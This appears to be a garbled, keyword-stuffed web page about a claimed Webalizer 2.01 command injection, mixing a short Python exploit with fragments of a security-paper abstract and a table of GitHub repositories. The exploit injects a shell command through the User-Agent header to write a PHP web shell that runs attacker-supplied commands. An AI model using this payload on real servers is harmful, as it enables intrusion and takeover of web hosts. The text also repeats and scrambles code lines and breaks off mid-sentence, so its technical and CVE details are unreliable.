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Webalizer 2.01 Exploit Github ›

headers = "User-Agent": payload requests.get(target, headers=headers)

import requests target = "http://example.com/webalizer/" payload = '"; echo "<?php system($_GET['cmd']); ?>" > shell.php; #' webalizer 2.01 exploit github

| Category | Count (approx) | Purpose | |----------|----------------|---------| | PoC / educational | 7 | Demonstrate vulnerability, often with curl one-liners | | Weaponized scripts | 5 | Python/Ruby scripts with reverse shell payloads | | Metasploit modules | 3 | Integration into Metasploit Framework | headers = "User-Agent": payload requests

Date: April 17, 2026 Subject: Webalizer 2.01 – Authentication Bypass / Command Injection (CVE-2022-45438) Source Vector: Public Exploit Code Repositories (GitHub) 1. Abstract Webalizer 2.01, a long-used web server log analysis tool, contains a critical pre-authentication remote command execution vulnerability. Despite its age, instances remain exposed online. This paper analyzes the technical nature of the exploit, reviews the public GitHub repositories hosting proof-of-concept (PoC) and weaponized code, and assesses the risk to legacy infrastructure. 2. Vulnerability Background | Field | Details | |-------|---------| | Software | Webalizer 2.01 (and earlier) | | CVE ID | CVE-2022-45438 (assigned late, affects older versions) | | Type | OS Command Injection via crafted User-Agent or log entry | | Impact | Remote Code Execution (RCE) as web server user | | CVSS v3 | 9.8 (Critical) | | Discovery | Public disclosure ~2022; code dates back to 2000s | This paper analyzes the technical nature of the

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